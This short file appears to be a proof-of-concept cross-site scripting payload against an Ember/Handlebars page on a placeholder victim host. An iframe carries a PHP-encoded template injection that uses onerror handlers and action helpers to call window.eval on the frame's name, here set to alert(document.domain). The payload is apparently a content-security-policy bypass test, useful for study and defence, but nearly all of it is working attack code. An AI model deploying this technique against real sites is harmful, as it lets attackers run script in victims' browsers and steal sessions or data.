<iframe src='//victim.example.com/repo/csp/ue/ember.php?inj=<?php
$payload=<<<'PAYLOAD'
<script type="text/x-handlebars">
  <img alt="window = {{window}}" src=about:blank onerror={{action (mut window) value="target.ownerDocument.defaultView"}}>
  <img alt="window.eval(window.name)" src=about:blank onerror={{action window.eval value="target.ownerDocument.defaultView.name" target=window}}>
</script>
PAYLOAD;
echo rawurlencode($payload);
?>' name="alert(document.domain)"></iframe>
